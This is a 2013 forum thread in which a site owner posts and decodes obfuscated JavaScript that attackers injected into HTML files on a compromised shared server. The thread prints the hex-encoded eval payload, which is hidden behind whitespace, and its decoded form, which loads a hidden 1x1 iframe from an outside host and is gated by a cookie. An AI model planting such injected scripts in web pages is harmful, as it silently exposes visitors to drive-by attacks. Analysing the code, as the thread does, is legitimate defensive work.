Some Interesting Obfuscated Snippets

Some Interesting Obfuscated Snippets - Security & Cryptography

Users browsing this thread: 1 Guest(s)

	pyr0byte Offline \| 10-08-2013, 02:26 AM \| #1

One of my shared web servers was compromised and this type of shit has been added to tons of files on the server. I'll occasionally update this with new finds. No, the host does not care. They do not believe me. No, I will not be renewing my plan.

Appended to various HTML files:

Code:
<script type="text/javascript" language="javascript" >                                                                                                                                                                                                                                                          try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="2e74837c7182777d7c2e88888874747436372e891b182e846f802e877b7b78782e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e877b7b78783c8180712e4b2e357682827e483d3d7a777d827d7c3c717d7b3c76793d777b6f7573813d515c7e5e428279453c7e767e35491b182e877b7b78783c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e877b7b78783c8182877a733c707d807273802e4b2e353e35491b182e877b7b78783c8182877a733c7673777576822e4b2e353f7e8635491b182e877b7b78783c8182877a733c85777282762e4b2e353f7e8635491b182e877b7b78783c8182877a733c7a7374822e4b2e353f7e8635491b182e877b7b78783c8182877a733c827d7e2e4b2e353f7e8635491b181b182e77742e362f727d71837b737c823c757382537a737b737c82508757723635877b7b78783537372e891b182e727d71837b737c823c858077827336354a7277842e77724b6a35877b7b78786a354c4a3d7277844c3537491b182e727d71837b737c823c757382537a737b737c82508757723635877b7b787835373c6f7e7e737c725176777a7236877b7b787837491b182e8b1b188b1b1874837c7182777d7c2e617382517d7d79777336717d7d7977735c6f7b733a717d7d797773646f7a83733a7c526f87813a7e6f8276372e891b182e846f802e827d726f872e4b2e7c73852e526f82733637491b182e846f802e73867e7780732e4b2e7c73852e526f82733637491b182e77742e367c526f87814b4b7c837a7a2e8a8a2e7c526f87814b4b3e372e7c526f87814b3f491b182e73867e7780733c81738262777b7336827d726f873c75738262777b7336372e392e41443e3e3e3e3e384042387c526f878137491b182e727d71837b737c823c717d7d7977732e4b2e717d7d7977735c6f7b7339304b30397381716f7e7336717d7d797773646f7a8373371b182e392e304973867e778073814b302e392e73867e7780733c827d555b62618280777c7536372e392e36367e6f8276372e4d2e30492e7e6f82764b302e392e7e6f82762e482e303037491b188b1b1874837c7182777d7c2e557382517d7d797773362e7c6f7b732e372e891b182e846f802e81826f80822e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e7c6f7b732e392e304b302e37491b182e846f802e7a737c2e4b2e81826f80822e392e7c6f7b733c7a737c7582762e392e3f491b182e77742e362e362e2f81826f80822e372e34341b182e362e7c6f7b732e2f4b2e727d71837b737c823c717d7d7977733c818370818280777c75362e3e3a2e7c6f7b733c7a737c7582762e372e372e371b182e891b182e80738283807c2e7c837a7a491b182e8b1b182e77742e362e81826f80822e4b4b2e3b3f2e372e80738283807c2e7c837a7a491b182e846f802e737c722e4b2e727d71837b737c823c717d7d7977733c777c7273865d74362e3049303a2e7a737c2e37491b182e77742e362e737c722e4b4b2e3b3f2e372e737c722e4b2e727d71837b737c823c717d7d7977733c7a737c758276491b182e80738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e37491b188b1b1877742e367c6f8477756f827d803c717d7d797773537c6f707a7372371b18891b18777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491b181b188888887474743637491b188b1b188b1b18";z=[];for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr"+"omCharCode"].apply(ss,z));</script>

(just found, thought it'd be neat to post here, gonna see what it does right quick)

So that code executes this:

Code:
function zzzfff() {

 var ymmjj = document.createElement('iframe');

 ymmjj.src = 'http://lioton.com.hk/images/CNpP4tk7.php';

 ymmjj.style.position = 'absolute';

 ymmjj.style.border = '0';

 ymmjj.style.height = '1px';

 ymmjj.style.width = '1px';

 ymmjj.style.left = '1px';

 ymmjj.style.top = '1px';

 if (!document.getElementById('ymmjj')) {

 document.write('<div id=\'ymmjj\'></div>');

 document.getElementById('ymmjj').appendChild(ymmjj);

 }

}

function SetCookie(cookieName,cookieValue,nDays,path) {

 var today = new Date();

 var expire = new Date();

 if (nDays==null || nDays==0) nDays=1;

 expire.setTime(today.getTime() + 3600000*24*nDays);

 document.cookie = cookieName+"="+escape(cookieValue)

 + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");

}

function GetCookie( name ) {

 var start = document.cookie.indexOf( name + "=" );

 var len = start + name.length + 1;

 if ( ( !start ) &&

 ( name != document.cookie.substring( 0, name.length ) ) )

 {

 return null;

 }

 if ( start == -1 ) return null;

 var end = document.cookie.indexOf( ";", len );

 if ( end == -1 ) end = document.cookie.length;

 return unescape( document.cookie.substring( len, end ) );

}

if (navigator.cookieEnabled)

{

if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');

zzzfff();

}

}

It apparently sets a cookie with the name "visited_uq" to the value 55. Does anybody have any ideas? The .com.hk URL links to a PHP script that echos "ok". I don't see the value referenced any where else in this particular block, but it creates an iFrame holding the value so it would be globally accessible on the page.

	pyr0byte Offline \| 12-08-2013, 01:07 AM \| #2

Yeah, it's definitely malicious. When I remove them new ones are added, usually basically the same. They always lead to really bizarre websites which I assume are decoys or something...

View a Printable Version